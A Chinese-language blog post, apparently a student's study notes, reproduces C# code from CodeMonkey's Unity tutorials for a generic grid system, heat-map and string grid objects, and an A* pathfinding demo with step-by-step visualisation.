    using CodeMonkey.Utils;

    public class Testing : MonoBehaviour
    {
    private Grid<HeatMapGridObject> grid;
    // Start is called before the first frame update
    void Start()
    {
    grid = new Grid<HeatMapGridObject>(4, 2, 10f, new Vector3(20, 0), (Grid<HeatMapGridObject> g, int x, int y) => new HeatMapGridObject(g, x, y));
    }

    private void Update()
    {
    if (Input.GetMouseButtonDown(0))
    {
    Vector3 position = UtilsClass.GetMouseWorldPosition();
    HeatMapGridObject heatMapGridObject = grid.GetGridObject(position);
    if (heatMapGridObject != null)
    {
    heatMapGridObject.AddValue(5);
    }
    }
    }

    public class HeatMapGridObject
    {
    private const int MIN = 0;
    private const int MAX = 100;

    private Grid<HeatMapGridObject> grid;
    private int x;
    private int y;
    private int value;

    public HeatMapGridObject(Grid<HeatMapGridObject> grid, int x, int y)
    {
    this.grid = grid;
    this.x = x;
    this.y = y;
    }

    public void AddValue(int addValue)
    {
    value += addValue;
    Mathf.Clamp(value, MIN, MAX);
    grid.TriggerGridObjectChanged(x, y);
    }

    public float GetValueNormalized()
    {
    return (float)value / MAX;
    }

    public override string ToString()
    {
    return value.ToString();
    }
    }
    }

    运行效果:

    png

    设计并使用 StringGridObject 类

    设计并使用 StringGridObject 类的完整 Testing.cs 代码:

    using UnityEngine;
    using CodeMonkey.Utils;

    public class Testing : MonoBehaviour
    {
    private Grid<StringGridObject> stringGrid;
    // Start is called before the first frame update
    void Start()
    {
    stringGrid = new Grid<StringGridObject>(4, 2, 10f, new Vector3(20, 0), (Grid<StringGridObject> g, int x, int y) => new StringGridObject(g, x, y));
    }

    private void Update()
    {
    Vector3 position = UtilsClass.GetMouseWorldPosition();
    if (Input.GetKeyDown(KeyCode.A)) { stringGrid.GetGridObject(position).AddLetter("A"); }
    if (Input.GetKeyDown(KeyCode.B)) { stringGrid.GetGridObject(position).AddLetter("B"); }
    if (Input.GetKeyDown(KeyCode.C)) { stringGrid.GetGridObject(position).AddLetter("C"); }

    if (Input.GetKeyDown(KeyCode.Alpha1)) { stringGrid.GetGridObject(position).AddNumber("1"); }
    if (Input.GetKeyDown(KeyCode.Alpha2)) { stringGrid.GetGridObject(position).AddNumber("2"); }
    if (Input.GetKeyDown(KeyCode.Alpha3)) { stringGrid.GetGridObject(position).AddNumber("3"); }
    }

    public class StringGridObject
    {
    private Grid<StringGridObject> grid;
    private int x;
    private int y;

    public string letters;
    public string numbers;

    public StringGridObject(Grid<StringGridObject> grid, int x, int y)
    {
    this.grid = grid;
    this.x = x;
    this.y = y;
    letters = "";
    numbers = "";
    }

    public void AddLetter(string letter)
    {
    letters += letter;
    grid.TriggerGridObjectChanged(x, y);
    }

    public void AddNumber(string number)
    {
    numbers += number;
    grid.TriggerGridObjectChanged(x, y);
    }

    public override string ToString()
    {
    return letters + "\n" + numbers;
    }
    }
    }

    运行效果:

    png

    AStar 算法

    A* Pathfinding in Unity

    这篇的代码量还真是大…直接抄吧

    场景对象布局

    png

    CharacterPathfindingMovementHandler 控制人物行走

    using System.Collections.Generic;
    using UnityEngine;
    using V_AnimationSystem;
    using CodeMonkey.Utils;

    public class CharacterPathfindingMovementHandler : MonoBehaviour {

    private const float speed = 40f;

    private V_UnitSkeleton unitSkeleton;
    private V_UnitAnimation unitAnimation;
    private AnimatedWalker animatedWalker;
    private int currentPathIndex;
    private List<Vector3> pathVectorList;


    private void Start() {
    Transform bodyTransform = transform.Find("Body");
    unitSkeleton = new V_UnitSkeleton(1f, bodyTransform.TransformPoint, (Mesh mesh) => bodyTransform.GetComponent<MeshFilter>().mesh = mesh);
    unitAnimation = new V_UnitAnimation(unitSkeleton);
    animatedWalker = new AnimatedWalker(unitAnimation, UnitAnimType.GetUnitAnimType("dMarine_Idle"), UnitAnimType.GetUnitAnimType("dMarine_Walk"), 1f, 1f);
    }

    private void Update() {
    HandleMovement();
    unitSkeleton.Update(Time.deltaTime);

    if (Input.GetMouseButtonDown(0)) {
    SetTargetPosition(UtilsClass.GetMouseWorldPosition());
    }
    }

    private void HandleMovement() {
    if (pathVectorList != null) {
    Vector3 targetPosition = pathVectorList[currentPathIndex];
    if (Vector3.Distance(transform.position, targetPosition) > 1f) {
    Vector3moveDir = (targetPosition - transform.position).normalized;

    float distanceBefore = Vector3.Distance(transform.position, targetPosition);
    animatedWalker.SetMoveVector(moveDir);
    transform.position = transform.position + moveDir * speed * Time.deltaTime;
    } else {
    currentPathIndex++;
    if (currentPathIndex >= pathVectorList.Count) {
    StopMoving();
    animatedWalker.SetMoveVector(Vector3.zero);
    }
    }
    } else {
    animatedWalker.SetMoveVector(Vector3.zero);
    }
    }

    private void StopMoving() {
    pathVectorList = null;
    }

    public Vector3 GetPosition() {
    return transform.position;
    }

    public void SetTargetPosition(Vector3 targetPosition) {
    currentPathIndex = 0;
    pathVectorList = Pathfinding.Instance.FindPath(GetPosition(), targetPosition);

    if (pathVectorList != null && pathVectorList.Count > 1) {
    pathVectorList.RemoveAt(0);
    }
    }
    }

    PathfindingDebugStepVisual 界面可视化

    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using TMPro;
    using CodeMonkey.Utils;

    public class PathfindingDebugStepVisual : MonoBehaviour {
    public static PathfindingDebugStepVisual Instance { get; private set; }
    [SerializeField] private Transform pfPathfindingDebugStepVisualNode;
    private List<Transform> visualNodeList;
    private List<GridSnapshotAction> gridSnapshotActionList;
    private bool autoShowSnapshots;
    private float autoShowSnapshotsTimer;
    private Transform[,] visualNodeArray;
    private void Awake() {
    Instance = this;
    visualNodeList = new List<Transform>();
    gridSnapshotActionList = new List<GridSnapshotAction>();
    }
    public void Setup(Grid<PathNode> grid) {
    visualNodeArray = new Transform[grid.GetWidth(), grid.GetHeight()];

    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    Vector3gridPosition = new Vector3(x, y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    Transform visualNode = CreateVisualNode(gridPosition);
    visualNodeArray[x, y] = visualNode;
    visualNodeList.Add(visualNode);
    }
    }
    HideNodeVisuals();
    }
    private void Update() {
    if (Input.GetKeyDown(KeyCode.Space)) {
    ShowNextSnapshot();
    }

    if (Input.GetKeyDown(KeyCode.Return)) {
    autoShowSnapshots = true;
    }
    if (autoShowSnapshots) {
    float autoShowSnapshotsTimerMax = .05f;
    autoShowSnapshotsTimer -= Time.deltaTime;
    if (autoShowSnapshotsTimer <= 0f) {
    autoShowSnapshotsTimer += autoShowSnapshotsTimerMax;
    ShowNextSnapshot();
    if (gridSnapshotActionList.Count == 0) {
    autoShowSnapshots = false;
    }
    }
    }
    }
    private void ShowNextSnapshot() {
    if (gridSnapshotActionList.Count > 0) {
    GridSnapshotAction gridSnapshotAction = gridSnapshotActionList[0];
    gridSnapshotActionList.RemoveAt(0);
    gridSnapshotAction.TriggerAction();
    }
    }
    public void ClearSnapshots() {
    gridSnapshotActionList.Clear();
    }
    public void TakeSnapshot(Grid<PathNode> grid, PathNode current, List<PathNode> openList, List<PathNode> closedList) {
    GridSnapshotAction gridSnapshotAction = new GridSnapshotAction();
    gridSnapshotAction.AddAction(HideNodeVisuals);
    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    PathNode pathNode = grid.GetGridObject(x, y);
    int gCost = pathNode.gCost;
    int hCost = pathNode.hCost;
    int fCost = pathNode.fCost;
    Vector3gridPosition = new Vector3(pathNode.x, pathNode.y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    bool isCurrent = pathNode == current;
    bool isInOpenList = openList.Contains(pathNode);
    bool isInClosedList = closedList.Contains(pathNode);
    int tmpX = x;
    int tmpY = y;
    gridSnapshotAction.AddAction(() => {
    Transform visualNode = visualNodeArray[tmpX, tmpY];
    SetupVisualNode(visualNode, gCost, hCost, fCost);
    Color backgroundColor = UtilsClass.GetColorFromString("636363");
    if (isInClosedList) {
    backgroundColor = new Color(1, 0, 0);
    }
    if (isInOpenList) {
    backgroundColor = UtilsClass.GetColorFromString("009AFF");
    }
    if (isCurrent) {
    backgroundColor = new Color(0, 1, 0);
    }
    visualNode.Find("sprite").GetComponent<SpriteRenderer>().color = backgroundColor;
    });
    }
    }
    gridSnapshotActionList.Add(gridSnapshotAction);
    }
    public void TakeSnapshotFinalPath(Grid<PathNode> grid, List<PathNode> path) {
    GridSnapshotAction gridSnapshotAction = new GridSnapshotAction();
    gridSnapshotAction.AddAction(HideNodeVisuals);
    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    PathNode pathNode = grid.GetGridObject(x, y);
    int gCost = pathNode.gCost;
    int hCost = pathNode.hCost;
    int fCost = pathNode.fCost;
    Vector3gridPosition = new Vector3(pathNode.x, pathNode.y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    bool isInPath = path.Contains(pathNode);
    int tmpX = x;
    int tmpY = y;
    gridSnapshotAction.AddAction(() => {
    Transform visualNode = visualNodeArray[tmpX, tmpY];
    SetupVisualNode(visualNode, gCost, hCost, fCost);
    Color backgroundColor;
    if (isInPath) {
    backgroundColor = new Color(0, 1, 0);
    } else {
    backgroundColor = UtilsClass.GetColorFromString("636363");
    }
    visualNode.Find("sprite").GetComponent<SpriteRenderer>().color = backgroundColor;
    });
    }
    }
    gridSnapshotActionList.Add(gridSnapshotAction);
    }
    private void HideNodeVisuals() {
    foreach (Transform visualNodeTransform in visualNodeList) {
    SetupVisualNode(visualNodeTransform, 9999, 9999, 9999);
    }
    }
    private Transform CreateVisualNode(Vector3 position) {
    Transform visualNodeTransform = Instantiate(pfPathfindingDebugStepVisualNode, position, Quaternion.identity);
    return visualNodeTransform;
    }
    private void SetupVisualNode(Transform visualNodeTransform, int gCost, int hCost, int fCost) {
    if (fCost < 1000) {
    visualNodeTransform.Find("gCostText").GetComponent<TextMeshPro>().SetText(gCost.ToString());
    visualNodeTransform.Find("hCostText").GetComponent<TextMeshPro>().SetText(hCost.ToString());
    visualNodeTransform.Find("fCostText").GetComponent<TextMeshPro>().SetText(fCost.ToString());
    } else {
    visualNodeTransform.Find("gCostText").GetComponent<TextMeshPro>().SetText("");
    visualNodeTransform.Find("hCostText").GetComponent<TextMeshPro>().SetText("");
    visualNodeTransform.Find("fCostText").GetComponent<TextMeshPro>().SetText("");
    }
    }
    private class GridSnapshotAction {
    private Action action;
    public GridSnapshotAction() {
    action = () => { };
    }
    public void AddAction(Action action) {
    this.action += action;
    }
    public void TriggerAction() {
    action();
    }
    }
    }

    PathfindingDebugStepVisual 算法步骤可视化

    using System;
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using TMPro;
    using CodeMonkey.Utils;

    public class PathfindingDebugStepVisual : MonoBehaviour {
    public static PathfindingDebugStepVisual Instance { get; private set; }
    [SerializeField] private Transform pfPathfindingDebugStepVisualNode;
    private List<Transform> visualNodeList;
    private List<GridSnapshotAction> gridSnapshotActionList;
    private bool autoShowSnapshots;
    private float autoShowSnapshotsTimer;
    private Transform[,] visualNodeArray;
    private void Awake() {
    Instance = this;
    visualNodeList = new List<Transform>();
    gridSnapshotActionList = new List<GridSnapshotAction>();
    }
    public void Setup(Grid<PathNode> grid) {
    visualNodeArray = new Transform[grid.GetWidth(), grid.GetHeight()];
    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    Vector3gridPosition = new Vector3(x, y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    Transform visualNode = CreateVisualNode(gridPosition);
    visualNodeArray[x, y] = visualNode;
    visualNodeList.Add(visualNode);
    }
    }
    HideNodeVisuals();
    }
    private void Update() {
    if (Input.GetKeyDown(KeyCode.Space)) {
    ShowNextSnapshot();
    }
    if (Input.GetKeyDown(KeyCode.Return)) {
    autoShowSnapshots = true;
    }
    if (autoShowSnapshots) {
    float autoShowSnapshotsTimerMax = .05f;
    autoShowSnapshotsTimer -= Time.deltaTime;
    if (autoShowSnapshotsTimer <= 0f) {
    autoShowSnapshotsTimer += autoShowSnapshotsTimerMax;
    ShowNextSnapshot();
    if (gridSnapshotActionList.Count == 0) {
    autoShowSnapshots = false;
    }
    }
    }
    }
    private void ShowNextSnapshot() {
    if (gridSnapshotActionList.Count > 0) {
    GridSnapshotAction gridSnapshotAction = gridSnapshotActionList[0];
    gridSnapshotActionList.RemoveAt(0);
    gridSnapshotAction.TriggerAction();
    }
    }
    public void ClearSnapshots() {
    gridSnapshotActionList.Clear();
    }
    public void TakeSnapshot(Grid<PathNode> grid, PathNode current, List<PathNode> openList, List<PathNode> closedList) {
    GridSnapshotAction gridSnapshotAction = new GridSnapshotAction();
    gridSnapshotAction.AddAction(HideNodeVisuals);
    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    PathNode pathNode = grid.GetGridObject(x, y);
    int gCost = pathNode.gCost;
    int hCost = pathNode.hCost;
    int fCost = pathNode.fCost;
    Vector3gridPosition = new Vector3(pathNode.x, pathNode.y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    bool isCurrent = pathNode == current;
    bool isInOpenList = openList.Contains(pathNode);
    bool isInClosedList = closedList.Contains(pathNode);
    int tmpX = x;
    int tmpY = y;
    gridSnapshotAction.AddAction(() => {
    Transform visualNode = visualNodeArray[tmpX, tmpY];
    SetupVisualNode(visualNode, gCost, hCost, fCost);
    Color backgroundColor = UtilsClass.GetColorFromString("636363");

    if (isInClosedList) {
    backgroundColor = new Color(1, 0, 0);
    }
    if (isInOpenList) {
    backgroundColor = UtilsClass.GetColorFromString("009AFF");
    }
    if (isCurrent) {
    backgroundColor = new Color(0, 1, 0);
    }
    visualNode.Find("sprite").GetComponent<SpriteRenderer>().color = backgroundColor;
    });
    }
    }
    gridSnapshotActionList.Add(gridSnapshotAction);
    }
    public void TakeSnapshotFinalPath(Grid<PathNode> grid, List<PathNode> path) {
    GridSnapshotAction gridSnapshotAction = new GridSnapshotAction();
    gridSnapshotAction.AddAction(HideNodeVisuals);
    for (int x = 0; x < grid.GetWidth(); x++) {
    for (int y = 0; y < grid.GetHeight(); y++) {
    PathNode pathNode = grid.GetGridObject(x, y);
    int gCost = pathNode.gCost;
    int hCost = pathNode.hCost;
    int fCost = pathNode.fCost;
    Vector3gridPosition = new Vector3(pathNode.x, pathNode.y) * grid.GetCellSize() + Vector3.one * grid.GetCellSize() * .5f;
    bool isInPath = path.Contains(pathNode);
    int tmpX = x;
    int tmpY = y;
    gridSnapshotAction.AddAction(() => {
    Transform visualNode = visualNodeArray[tmpX, tmpY];
    SetupVisualNode(visualNode, gCost, hCost, fCost);
    Color backgroundColor;
    if (isInPath) {
    backgroundColor = new Color(0, 1, 0);
    } else {
    backgroundColor = UtilsClass.GetColorFromString("636363");
    }
    visualNode.Find("sprite").GetComponent<SpriteRenderer>().color = backgroundColor;
    });
    }
    }
    gridSnapshotActionList.Add(gridSnapshotAction);
    }
    private void HideNodeVisuals() {
    foreach (Transform visualNodeTransform in visualNodeList) {
    SetupVisualNode(visualNodeTransform, 9999, 9999, 9999);
    }
    }
    private Transform CreateVisualNode(Vector3 position) {
    Transform visualNodeTransform = Instantiate(pfPathfindingDebugStepVisualNode, position, Quaternion.identity);
    return visualNodeTransform;
    }
    private void SetupVisualNode(Transform visualNodeTransform, int gCost, int hCost, int fCost) {
    if (fCost < 1000) {
    visualNodeTransform.Find("gCostText").GetComponent<TextMeshPro>().SetText(gCost.ToString());
    visualNodeTransform.Find("hCostText").GetComponent<TextMeshPro>().SetText(hCost.ToString());
    visualNodeTransform.Find("fCostText").GetComponent<TextMeshPro>().SetText(fCost.ToString());
    } else {
    visualNodeTransform.Find("gCostText").GetComponent<TextMeshPro>().SetText("");
    visualNodeTransform.Find("hCostText").GetComponent<TextMeshPro>().SetText("");
    visualNodeTransform.Find("fCostText").GetComponent<TextMeshPro>().SetText("");
    }
    }
    private class GridSnapshotAction {
    private Action action;
    public GridSnapshotAction() {
    action = () => { };
    }
    public void AddAction(Action action) {
    this.action += action;
    }
    public void TriggerAction() {
    action();
    }
    }
    }

    Testing.cs

    Testing.cs 源代码:

    using System.Collections.Generic;
    using UnityEngine;
    using CodeMonkey.Utils;
    using CodeMonkey;

    public class Testing : MonoBehaviour {

    [SerializeField] private PathfindingDebugStepVisual pathfindingDebugStepVisual;
    [SerializeField] private PathfindingVisual pathfindingVisual;
    [SerializeField] private CharacterPathfindingMovementHandler characterPathfinding;
    private Pathfinding pathfinding;

    private void Start() {
    pathfinding = new Pathfinding(20, 10);
    pathfindingDebugStepVisual.Setup(pathfinding.GetGrid());
    pathfindingVisual.SetGrid(pathfinding.GetGrid());
    }

    private void Update() {
    if (Input.GetMouseButtonDown(0)) {
    Vector3mouseWorldPosition = UtilsClass.GetMouseWorldPosition();
    pathfinding.GetGrid().GetXY(mouseWorldPosition, out int x, out int y);
    List<PathNode> path = pathfinding.FindPath(0, 0, x, y);
    if (path != null) {
    for (int i=0; i<path.Count - 1; i++) {
    Debug.DrawLine(new Vector3(path[i].x, path[i].y) * 10f + Vector3.one * 5f, new Vector3(path[i+1].x, path[i+1].y) * 10f + Vector3.one * 5f, Color.green, 5f);
    }
    }
    characterPathfinding.SetTargetPosition(mouseWorldPosition);
    }

    if (Input.GetMouseButtonDown(1)) {
    Vector3mouseWorldPosition = UtilsClass.GetMouseWorldPosition();
    pathfinding.GetGrid().GetXY(mouseWorldPosition, out int x, out int y);
    pathfinding.GetNode(x, y).SetIsWalkable(!pathfinding.GetNode(x, y).isWalkable);
    }
    }

    }
    ]]>
    + 相关资源

    ​ 在本科毕设的时候使用到的一个 Unity 的网格系统, 但是那时候没有做笔记有点忘了 orz, 现在为了做算法大作业再拿出来用用…只看了前三节的部分实现 A*算法就行.

    ​ 这个 CodeMonkey 的代码能力还是很牛逼的, 我不介意重学一遍

    正文

    网格系统

    Grid System in Unity (Heatmap, Pathfinding, Building Area)

    设计 Grid 类

    建立了一个 Grid 类, 包含如下元素:

    • 宽 width
    • 高 height
    • 网格大小 cellSize
    • 起始位置 originPosition
    • 网格数组 gridArray
    • debug 用数组 debugTextArray
    1
    2
    3
    4
    5
    6
    private int width;
    private int height;
    private float cellSize;
    private Vector3 originPosition;
    private int[,] gridArray;
    private TextMesh[,] debugTextArray;

    设计构造函数

    设计构造函数 public Grid(int width, int height, float cellSize, Vector3 originPosition)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    public Grid(int width, int height, float cellSize, Vector3 originPosition)
    {
    this.width = width;
    this.height = height;
    this.cellSize = cellSize;
    this.originPosition = originPosition;

    gridArray = new int[width, height];
    debugTextArray = new TextMesh[width, height];

    for (int x = 0; x < gridArray.GetLength(0); x++)
    {
    for (int y = 0; y < gridArray.GetLength(1); y++)
    {
    debugTextArray[x, y] = UtilsClass.CreateWorldText(gridArray[x, y].ToString(), null, GetWorldPosition(x, y) + new Vector3(cellSize, cellSize) * .5f, 20, Color.white, TextAnchor.MiddleCenter);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x, y + 1), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x + 1, y), Color.white, 100f);
    }
    }
    Debug.DrawLine(GetWorldPosition(0, height), GetWorldPosition(width, height), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(width, 0), GetWorldPosition(width, height), Color.white, 100f);
    }

    坐标转换

    此时有两种坐标:

    • 网格坐标 XY (数组的下标)
    • 游戏中的世界坐标 WorldPosition

    设计两个函数用于两种坐标之间的转换:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    private Vector3 GetWorldPosition(int x, int y)
    {
    return new Vector3(x, y) * cellSize + originPosition;
    }

    private void GetXY(Vector3 worldPosition, out int x, out int y)
    {
    x = Mathf.FloorToInt((worldPosition - originPosition).x / cellSize);
    y = Mathf.FloorToInt((worldPosition - originPosition).y / cellSize);
    }

    设置网格系统中的值

    根据坐标设置网格系统中的值:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    public void SetValue(int x, int y, int value)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    gridArray[x, y] = value;
    debugTextArray[x, y].text = gridArray[x, y].ToString();
    }
    }

    public void SetValue(Vector3 worldPosition, int value)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    SetValue(x, y, value);
    }

    获取网格系统中的值

    根据坐标获取网格系统中的值:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    public int GetValue(int x, int y)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    return gridArray[x, y];
    }
    else
    {
    return 0;
    }
    }

    public int GetValue(Vector3 worldPosition)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    return GetValue(x, y);
    }

    鼠标交互

    Testing.cs 中使用 Grid 类, 使用鼠标可以修改/获取网格系统中的值. 下面是 Testing.cs 的完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    using UnityEngine;
    using CodeMonkey.Utils;

    public class Testing : MonoBehaviour
    {
    private Grid grid;
    // Start is called before the first frame update
    void Start()
    {
    grid = new Grid(4, 2, 10f, new Vector3(20, 0));
    }

    private void Update()
    {
    if (Input.GetMouseButtonDown(0))
    {
    grid.SetValue(UtilsClass.GetMouseWorldPosition(), 56);
    }
    if (Input.GetMouseButtonDown(1))
    {
    Debug.Log(grid.GetValue(UtilsClass.GetMouseWorldPosition()));
    }
    }
    }

    Grid.cs 完整代码

    Grid.cs 的完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    using UnityEngine;
    using CodeMonkey.Utils;

    public class Grid
    {
    private int width;
    private int height;
    private float cellSize;
    private Vector3 originPosition;
    private int[,] gridArray;
    private TextMesh[,] debugTextArray;

    public Grid(int width, int height, float cellSize, Vector3 originPosition)
    {
    this.width = width;
    this.height = height;
    this.cellSize = cellSize;
    this.originPosition = originPosition;

    gridArray = new int[width, height];
    debugTextArray = new TextMesh[width, height];

    for (int x = 0; x < gridArray.GetLength(0); x++)
    {
    for (int y = 0; y < gridArray.GetLength(1); y++)
    {
    debugTextArray[x, y] = UtilsClass.CreateWorldText(gridArray[x, y].ToString(), null, GetWorldPosition(x, y) + new Vector3(cellSize, cellSize) * .5f, 20, Color.white, TextAnchor.MiddleCenter);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x, y + 1), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x + 1, y), Color.white, 100f);
    }
    }
    Debug.DrawLine(GetWorldPosition(0, height), GetWorldPosition(width, height), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(width, 0), GetWorldPosition(width, height), Color.white, 100f);
    }
    private Vector3 GetWorldPosition(int x, int y)
    {
    return new Vector3(x, y) * cellSize + originPosition;
    }

    private void GetXY(Vector3 worldPosition, out int x, out int y)
    {
    x = Mathf.FloorToInt((worldPosition - originPosition).x / cellSize);
    y = Mathf.FloorToInt((worldPosition - originPosition).y / cellSize);
    }

    public void SetValue(int x, int y, int value)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    gridArray[x, y] = value;
    debugTextArray[x, y].text = gridArray[x, y].ToString();
    }
    }

    public void SetValue(Vector3 worldPosition, int value)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    SetValue(x, y, value);
    }

    public int GetValue(int x, int y)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    return gridArray[x, y];
    }
    else
    {
    return 0;
    }
    }

    public int GetValue(Vector3 worldPosition)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    return GetValue(x, y);
    }
    }

    Powerful Generics Added! Grid System in Unity (Terraria, Minesweeper, Tilemap)

    使用泛型

    大概意思就是修改上一章的Grid.cs, 添加泛型, 增加代码的重用性

    将类名修改为:

    1
    public class Grid<TGridObject>

    网格数组 gridArray 中的类型不再使用 int, 而是使用<TGridObject>:

    1
    private TGridObject[,] gridArray;

    构造函数使用了委托Func<Grid<TGridObject>, int, int, TGridObject> createGridObject:

    1
    public Grid(int width, int height, float cellSize, Vector3 originPosition, Func<Grid<TGridObject>, int, int, TGridObject> createGridObject)

    使用了事件 event, 但是我没学过 orz 就照抄了…

    1
    2
    3
    4
    5
    6
    public event EventHandler<OnGridValueChangedEventArgs> OnGridValueChanged;
    public class OnGridValueChangedEventArgs : EventArgs
    {
    public int x;
    public int y;
    }

    Grid.cs 完整代码

    一些函数的名称也因语义做相关改变, 附Grid.cs的完整代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    using UnityEngine;
    using CodeMonkey.Utils;
    using System;

    public class Grid<TGridObject>
    {
    public event EventHandler<OnGridValueChangedEventArgs> OnGridValueChanged;
    public class OnGridValueChangedEventArgs : EventArgs
    {
    public int x;
    public int y;
    }

    private int width;
    private int height;
    private float cellSize;
    private Vector3 originPosition;
    private TGridObject[,] gridArray;

    public Grid(int width, int height, float cellSize, Vector3 originPosition, Func<Grid<TGridObject>, int, int, TGridObject> createGridObject)
    {
    this.width = width;
    this.height = height;
    this.cellSize = cellSize;
    this.originPosition = originPosition;

    gridArray = new TGridObject[width, height];

    for(int x = 0; x < gridArray.GetLength(0); x++)
    {
    for(int y = 0; y < gridArray.GetLength(1); y++)
    {
    gridArray[x, y] = createGridObject(this, x, y);
    }
    }

    bool showDebug = true;
    if (showDebug)
    {
    TextMesh[,] debugTextArray = new TextMesh[width, height];
    for (int x = 0; x < gridArray.GetLength(0); x++)
    {
    for (int y = 0; y < gridArray.GetLength(1); y++)
    {
    debugTextArray[x, y] = UtilsClass.CreateWorldText(gridArray[x, y]?.ToString(), null, GetWorldPosition(x, y) + new Vector3(cellSize, cellSize) * .5f, 20, Color.white, TextAnchor.MiddleCenter);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x, y + 1), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(x, y), GetWorldPosition(x + 1, y), Color.white, 100f);
    }
    }
    Debug.DrawLine(GetWorldPosition(0, height), GetWorldPosition(width, height), Color.white, 100f);
    Debug.DrawLine(GetWorldPosition(width, 0), GetWorldPosition(width, height), Color.white, 100f);

    OnGridValueChanged += (object sender, OnGridValueChangedEventArgs eventArgs) =>
    {
    debugTextArray[eventArgs.x, eventArgs.y].text = gridArray[eventArgs.x, eventArgs.y]?.ToString();
    };
    }
    }
    private Vector3 GetWorldPosition(int x, int y)
    {
    return new Vector3(x, y) * cellSize + originPosition;
    }

    private void GetXY(Vector3 worldPosition, out int x, out int y)
    {
    x = Mathf.FloorToInt((worldPosition - originPosition).x / cellSize);
    y = Mathf.FloorToInt((worldPosition - originPosition).y / cellSize);
    }

    public void SetGridObject(int x, int y, TGridObject value)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    gridArray[x, y] = value;
    if (OnGridValueChanged != null)
    {
    OnGridValueChanged(this, new OnGridValueChangedEventArgs { x = x, y = y });
    }
    }
    }

    public void TriggerGridObjectChanged(int x, int y)
    {
    if (OnGridValueChanged != null)
    {
    OnGridValueChanged(this, new OnGridValueChangedEventArgs { x = x, y = y });
    }
    }

    public void SetGridObject(Vector3 worldPosition, TGridObject value)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    SetGridObject(x, y, value);
    }

    public TGridObject GetGridObject(int x, int y)
    {
    if (x >= 0 && y >= 0 && x < width && y < height)
    {
    return gridArray[x, y];
    }
    else
    {
    return default(TGridObject);
    }
    }

    public TGridObject GetGridObject(Vector3 worldPosition)
    {
    int x, y;
    GetXY(worldPosition, out x, out y);
    return GetGridObject(x, y);
    }
    }

    设计并使用 HeatMapGridObject 类

    此时就可以在 Testing.cs中自行设计类, 在网格系统中存储自己想要存储的数据:

    (因为我不需要使用热图, 所以没有按照视频搬运热图相关的代码)

    设计并使用 HeatMapGridObject 类的完整 Testing.cs 代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    using UnityEngine;
    using CodeMonkey.Utils;

    public class Testing : MonoBehaviour
    {
    private Grid<HeatMapGridObject> grid;
    // Start is called before the first frame update
    void Start()
    {
